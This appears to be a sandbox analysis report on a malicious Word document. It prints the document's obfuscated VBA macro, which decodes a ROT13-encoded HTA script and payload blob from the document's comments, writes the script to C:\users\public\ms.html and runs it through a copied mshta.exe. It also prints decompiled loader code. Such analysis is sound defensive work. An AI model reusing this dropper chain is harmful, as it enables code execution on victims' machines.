"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) -> 17902
Mid
Asc
as8nLc
Part of subcall function a9vceZ@aIsb7: Chr

Line	Instruction	Meta Information
2	Function a6sXJE(a2cCM) as String
3	Dim as6h1W as Long	executed
4	Dim aDKIk as Integer
5	Dim aJjwu as Integer
6	For as6h1W = 1 To VBA.Len(a2cCM) Step 1	Len("<ugzy> <obql> <fpevcg ynathntr="wninfpevcg"> ine n3ZDj4 = gehr; ine n3lnYb = -47909; shapgvba qrpbqr(vachg) { ine xrlfge = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/="; ine bhgchg = ""; ine pue1, pue2, pue3; ine rap1, rap2, rap3, rap4; ine v = 0; vachg = vachg.ercynpr(/[^N-Mn-m0-9\+\/\=]/t, ""); juvyr (v < vachg.yratgu) { rap1 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap2 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap3 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap4 = xrlfge.vaqrkBs(vachg.puneNg(v++)); pue1 = (rap1 << 2) \| (rap2 >> 4); pue2 = ((rap2 & 15) << 4) \| (rap3 >> 2); pue3 = ((rap3 & 3) << 6) \| rap4; bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue1); vs(rap3 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue2); } vs(rap4 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue3); } } erghea(bhgchg); } ine nIRdc = gehr; ine ngcbN = "UXRL_PHEERAG_HFRE\\Fbsgjner\\nUtIG\\nhW5i2"; ine n7CwL = "n9VyF"; ine n4dtjh = n7CwL.yratgu; naQ3Jo = gehr; jvaqbj.erfvmrGb(1, 1); nwElY = -57746; ine nZhWU = gehr; jvaqbj.zbirGb(-101, -101); n2Bef = 17403; ine nWLt6 = gehr; ine nTWls = gehr; ine nCgZ7i = arj NpgvirKBowrpg("jfpevcg.furyy"); nuJ5n = 16458; nbdxF = "n21uHX"; ine njeCc = nbdxF.gbHccrePnfr(); ine nLCO4j = "ngbCL0"; nf14m = nLCO4j.gbFgevat(); ntMYZ = "nkQd5q"; n0CTb = snyfr; ine nxrv9d = "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) -> 17902 executed
11	aJjwu = 0
15	aMnjk = Mid(a2cCM, as6h1W, 1)	Mid
16	aDKIk = Asc(aMnjk)	Asc
21	If (aDKIk > 64 And aDKIk < 91) Or (aDKIk > 96 And aDKIk < 123) Then
22	aJjwu = as8nLc	as8nLc
23	aDKIk = aYzBn(aDKIk, aJjwu)
28	If aDKIk < a3eJx(5) And aDKIk > 83 Then
29	aDKIk = a3ox6(aDKIk)
30	Elseif aDKIk < 128 - 63 Then
31	aDKIk = a3ox6(aDKIk)
32	Endif
33	Endif
34	anFJy = a9vceZ(aDKIk)
35	MidDollar (a2cCM, as6h1W, 1) = adBRr(anFJy)
36	Next	Len("<ugzy> <obql> <fpevcg ynathntr="wninfpevcg"> ine n3ZDj4 = gehr; ine n3lnYb = -47909; shapgvba qrpbqr(vachg) { ine xrlfge = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/="; ine bhgchg = ""; ine pue1, pue2, pue3; ine rap1, rap2, rap3, rap4; ine v = 0; vachg = vachg.ercynpr(/[^N-Mn-m0-9\+\/\=]/t, ""); juvyr (v < vachg.yratgu) { rap1 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap2 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap3 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap4 = xrlfge.vaqrkBs(vachg.puneNg(v++)); pue1 = (rap1 << 2) \| (rap2 >> 4); pue2 = ((rap2 & 15) << 4) \| (rap3 >> 2); pue3 = ((rap3 & 3) << 6) \| rap4; bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue1); vs(rap3 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue2); } vs(rap4 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue3); } } erghea(bhgchg); } ine nIRdc = gehr; ine ngcbN = "UXRL_PHEERAG_HFRE\\Fbsgjner\\nUtIG\\nhW5i2"; ine n7CwL = "n9VyF"; ine n4dtjh = n7CwL.yratgu; naQ3Jo = gehr; jvaqbj.erfvmrGb(1, 1); nwElY = -57746; ine nZhWU = gehr; jvaqbj.zbirGb(-101, -101); n2Bef = 17403; ine nWLt6 = gehr; ine nTWls = gehr; ine nCgZ7i = arj NpgvirKBowrpg("jfpevcg.furyy"); nuJ5n = 16458; nbdxF = "n21uHX"; ine njeCc = nbdxF.gbHccrePnfr(); ine nLCO4j = "ngbCL0"; nf14m = nLCO4j.gbFgevat(); ntMYZ = "nkQd5q"; n0CTb = snyfr; ine nxrv9d = "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) -> 17902 executed
41	a6sXJE = a2cCM
42	End Function

Module: aRZcbw

Declaration

Line	Content
1	Attribute VB_Name = "aRZcbw"
2	Public Const a3IdJQ as String = "sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"
3	Public Const a7odJ as String = ")"
4	Public Const as8nLc as Integer = 30602 / 2354

Executed Functions

Function a8qpd, APIs: 1, Strings: 0, Number of lines: 3, Relevance: 1.253

APIs	Meta Information
BuiltInDocumentProperties

Line	Instruction	Meta Information
33	Function a8qpd(afAV8)
42	a8qpd = ActiveDocument.BuiltInDocumentProperties(afAV8)	BuiltInDocumentProperties executed
43	End Function

Subroutine aYKyQ, APIs: 0, Strings: 0, Number of lines: 5, Relevance: 0.005

Line	Instruction	Meta Information
44	Public Sub aYKyQ()
48	If - 342 + 406 < 164 Then	executed
49	Call aVzRp()
50	Endif
51	End Sub

Subroutine axIuO, APIs: 0, Strings: 0, Number of lines: 5, Relevance: 0.005

Line	Instruction	Meta Information
52	Public Sub axIuO()
53	If - 342 + 406 < 164 Then	executed
54	Call ah28l()
55	Endif
56	End Sub

Non-Executed Functions

Function aG87E, APIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
5	Function aG87E()
10	End Function

Subroutine a7zcHr, APIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
11	Sub a7zcHr(aFtIw)
32	End Sub

Module: abh0Rg

Declaration

Line	Content
1	Attribute VB_Name = "abh0Rg"

Executed Functions

Function aX4od, APIs: 2, Strings: 0, Number of lines: 6, Relevance: 4.506

APIs	Meta Information
FreeFile
Open	Open("C:\users\public\ms.html")

Line	Instruction	Meta Information
2	Public Function aX4od(aVOhvn, aA5aKj)
26	FileNumber = FreeFile	FreeFile executed
27	Open aVOhvn For Output As # FileNumber	Open("C:\users\public\ms.html") executed
32	Print # FileNumber, aA5aKj
37	Close # FileNumber
38	End Function

Subroutine amZcqK, APIs: 1, Strings: 0, Number of lines: 3, Relevance: 1.253

APIs	Meta Information
FileCopy

Line	Instruction	Meta Information
39	Sub amZcqK(aH6Oa, aicyF)
50	FileCopy aH6Oa, aicyF	FileCopy executed
51	End Sub

Function adBRr, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
52	Function adBRr(avhZYf)
53	adBRr = avhZYf	executed
54	End Function

Module: adGbPA

Declaration

Line	Content
1	Attribute VB_Name = "adGbPA"

Executed Functions

Subroutine ah28l, APIs: 7, Strings: 1, Number of lines: 4, Relevance: 12.004

APIs	Meta Information
Part of subcall function aX4od@abh0Rg: FreeFile
Part of subcall function aX4od@abh0Rg: Open
Part of subcall function a6sXJE@aOMv0: Len
Part of subcall function a6sXJE@aOMv0: Mid
Part of subcall function a6sXJE@aOMv0: Asc
Part of subcall function a6sXJE@aOMv0: as8nLc
Part of subcall function a8qpd@aRZcbw: BuiltInDocumentProperties

Strings	Decrypted Strings
"comments"

Line	Instruction	Meta Information
54	Sub ah28l()
55	aocn4g = ayUxA2(adkJvD(2))	executed
56	aX4od aocn4g, a6sXJE(a8qpd("comments"))
57	End Sub

Function aGSfMv, APIs: 3, Strings: 2, Number of lines: 3, Relevance: 7.503

APIs	Meta Information
Split
Part of subcall function aSGxU@a7A5m: Len
Part of subcall function aSGxU@a7A5m: Mid

Strings	Decrypted Strings
"l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)\|)o)t)o)m) )o)l)l)e)h)"
"\|"

Line	Instruction	Meta Information
2	Function aGSfMv()
3	aGSfMv = VBA.Split(aSGxU("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)\|)o)t)o)m) )o)l)l)e)h)"), "\|")	Split executed
4	End Function

Function adkJvD, APIs: 1, Strings: 0, Number of lines: 11, Relevance: 1.261

APIs	Meta Information
Part of subcall function aGSfMv@adGbPA: Split

Line	Instruction	Meta Information
5	Function adkJvD(ah7ovz)
10	apa2Q = aGSfMv()	executed
30	Select Case ah7ovz
35	Case 0
40	adkJvD = apa2Q(1)
45	Case 1
46	adkJvD = apa2Q(2)
50	Case 2
51	adkJvD = apa2Q(3)
52	End Select
53	End Function

Reset < >

Analysis Process: ms.com PID: 5308 Parent PID: 4940 ms.comCOMMON

Execution Graph

Execution Coverage:	39%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	47%
Total number of Nodes:	100
Total number of Limit Nodes:	5

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00B31460, Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 289
libraryregistryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E00B31460(intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				signed int _v5;
				void* _v12;
				void* _v16;
				int _v20;
				signed int _v24;
				struct HINSTANCE__* _v28;
				int _v32;
				int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				struct HINSTANCE__** _t67;
				void* _t69;
				long _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t75;
				_Unknown_base(*)()* _t76;
				long _t79;
				long _t82;
				CHAR* _t83;
				struct HINSTANCE__* _t84;
				struct HINSTANCE__* _t85;
				_Unknown_base(*)()* _t86;
				_Unknown_base(*)()* _t90;
				intOrPtr _t91;
				short* _t94;
				void* _t101;
				struct HINSTANCE__* _t106;
				struct HINSTANCE__** _t110;
				void* _t112;
				CHAR* _t116;
				intOrPtr* _t125;
				void* _t145;
				signed int _t146;
				CHAR* _t148;
				intOrPtr* _t149;
				struct HINSTANCE__* _t152;
				void* _t157;
				void* _t158;

				_t67 =  &_v28;
				__imp__#650( *0xb31008, 0, 1, _t67, 4, 0, 0); // executed
				if(_t67 < 0 || _v28 == 0) {
					__imp__SetProcessDEPPolicy(1); // executed
				}
				E00B317BB(_t67);
				_t69 = 2;
				if( *0xb33370 != _t69 ||  *0xb33364 != 6 ||  *0xb33368 != 1) {
					L9:
					_t70 = GetVersion();
					if(_t70 >= 0 && _t70 >= 6) {
						_t106 = GetModuleHandleW(L"Kernel32.dll");
						if(_t106 != 0) {
							_t149 = GetProcAddress(_t106, "HeapSetInformation");
							if(_t149 != 0) {
								 *0xb340cc(0, 1, 0, 0);
								 *_t149();
								if(_t158 != _t158) {
									asm("int 0x29");
								}
							}
						}
					}
					_v12 = _v12 | 0xffffffff;
					_v32 = 0x105;
					_t148 = E00B317D0(0x105);
					_t72 = E00B317D0(0x105);
					_v5 = 1;
					_t116 = _t72;
					if(_t148 == 0) {
						L50:
						if(_t116 != 0) {
							_push(_t116);
							L00B317F9();
						}
						L52:
						if(_v12 != 0xffffffff) {
							RegCloseKey(_v12);
						}
						return 0;
					}
					if(_t116 == 0) {
						L48:
						if(_t148 != 0) {
							_push(_t148);
							L00B317F9();
						}
						goto L50;
					}
					_t75 = LoadLibraryW(L"WLDP.DLL"); // executed
					_v16 = _t75;
					if(_t75 == 0) {
						goto L48;
					}
					_t76 = GetProcAddress(_t75, "WldpGetLockdownPolicy");
					_v28 = _t76;
					if(_t76 != 0) {
						_v52 = 1;
						_v48 = 1;
						_v44 = 0;
						_v40 = 0;
						 *0xb340cc( &_v52,  &_v24, 0); // executed
						_t101 = _v28();
						if(_t158 != _t158) {
							asm("int 0x29");
						}
						if(_t101 >= 0) {
							_v5 = _v5 & (_v24 & 0x80000000 | (_v24 & 0x8000001c) != 0x80000004) - 0x00000001;
						}
					}
					FreeLibrary(_v16); // executed
					if(_v5 != 0) {
						goto L48;
					} else {
						_t79 = RegOpenKeyExA(0x80000000, "clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", 0, 1,  &_v12); // executed
						if(_t79 != 0) {
							goto L48;
						}
						_t82 = RegQueryValueExA(_v12, 0, 0,  &_v20, _t148,  &_v32); // executed
						if(_t82 != 0) {
							goto L48;
						}
						_push(2);
						if(_v20 != 0) {
							L29:
							_t83 = _t148;
							L30:
							_t84 = LoadLibraryA(_t83); // executed
							_t152 = _t84;
							_push(_t148);
							_v28 = _t152;
							L00B317F9();
							_push(_t116);
							L00B317F9();
							_t116 = 0;
							_t148 = 0;
							if(_v12 != 0xffffffff) {
								RegCloseKey(_v12); // executed
								_v12 = _v12 | 0xffffffff;
							}
							_t85 = GetModuleHandleW(L"kernel32.dll");
							if(_t85 == 0) {
								L42:
								if(_t152 == 0) {
									goto L52;
								}
								_t86 = GetProcAddress(_t152, "RunHTMLApplication");
								_v36 = _t86;
								if(_t86 != 0) {
